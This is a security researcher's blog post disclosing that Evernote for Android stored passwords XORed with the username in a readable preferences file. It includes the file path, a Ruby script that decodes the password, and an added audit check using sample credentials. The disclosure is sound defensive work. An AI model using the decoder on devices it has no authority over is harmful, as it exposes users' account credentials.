Adam Caudill

Security Leader, Researcher, Developer, Writer, & Photographer

Evernote: XOR & Passwords


Update: Evernote has reported that this issue has been addressed.

Evernote for Android stores various settings in an XML file. That file isn’t really protected: it’s easily readable, especially if an attacker is able to get physical access to a device. What’s worse, it contains the user’s credentials.

/data/data/com.evernote/shared_prefs/com.evernote_preferences.xml

The username is located in the <string name="username"> element, and the password is stored in <string name="encrypted_password">. From the name you’d assume that the password is actually encrypted. You’d be wrong.

The password is simply XORed with the username, making recovery simple.

Here’s a simple script to “decrypt” the password:

#!/usr/bin/env ruby

##
# Copyright 2013 Adam Caudill <[email protected]>
#
# Decodes Evernote password recovered from Evernote for Android config file:
# File: /data/data/com.evernote/shared_prefs/com.evernote_preferences.xml
#   (may also be in <userid>.prof.xml if missing from com.evernote_preferences.xml)
# Password: <string name="encrypted_password">
# Username: <string name="username">
##

require "base64"

# Both arguments are required; stop here if they are missing
if ARGV.count != 2
  puts 'Usage: ./evernote_pass_decode.rb <pass> <username>'
  exit 1
end

# The stored value is Base64 text; decode it to the raw XORed bytes
pass = Base64.decode64(ARGV[0])
user = ARGV[1]
final = ''

# XOR each byte with the username character at the same position,
# wrapping around when the password is longer than the username
pass.bytes.each_with_index do |byte, index|
  final += (byte ^ user[index % user.length].unpack('c')[0]).chr
end

puts "Password: #{final}"
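
For anyone reviewing an app's stored preferences, the same weakness can be turned into an audit check. The following is an added example, not part of the original post or of Evernote's code: it builds a constructed preferences file in the layout described above and flags it when the "encrypted" value becomes printable text using only the username stored beside it. The sample credentials and the names `xor_bytes`, `pref` and `audit_prefs` are assumptions made for illustration.

```ruby
# Constructed sample values; these credentials are made up for the example.
SAMPLE_USER = 'alice@example.com'
SAMPLE_PASS = 'correct horse'

# Repeating-key XOR over raw bytes. The same call encodes and decodes,
# so anyone who holds the key can reverse the result.
def xor_bytes(data, key)
  k = key.bytes
  data.bytes.each_with_index.map { |b, i| b ^ k[i % k.length] }.pack('C*')
end

# Build a preferences file in the layout the post describes
# (assumed encoding: Base64 of the XOR output, as the script above decodes).
def sample_prefs
  stored = [xor_bytes(SAMPLE_PASS, SAMPLE_USER)].pack('m0')
  <<~XML
    <map>
      <string name="username">#{SAMPLE_USER}</string>
      <string name="encrypted_password">#{stored}</string>
    </map>
  XML
end

# Pull one <string name="..."> value out of the file; a regex is enough
# for this flat, constructed sample.
def pref(xml, name)
  xml[/<string name="#{Regexp.escape(name)}">([^<]*)<\/string>/, 1]
end

# Audit check: returns a finding when the stored value turns into printable
# text using only data kept next to it, i.e. the key ships with the ciphertext.
# The recovered value itself is not reported, only its length.
def audit_prefs(xml)
  user = pref(xml, 'username')
  blob = pref(xml, 'encrypted_password')
  return nil if user.nil? || user.empty? || blob.nil?
  plain = xor_bytes(blob.unpack1('m'), user)
  return nil unless plain.bytes.all? { |b| b.between?(0x20, 0x7e) }
  { issue: 'encrypted_password is reversible with the adjacent username',
    recovered_length: plain.length }
end

p audit_prefs(sample_prefs) if __FILE__ == $PROGRAM_NAME
```

A stored secret passes this check only if it cannot be derived from the file alone, for example a revocable session token or a value protected by a key held in the platform keystore.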
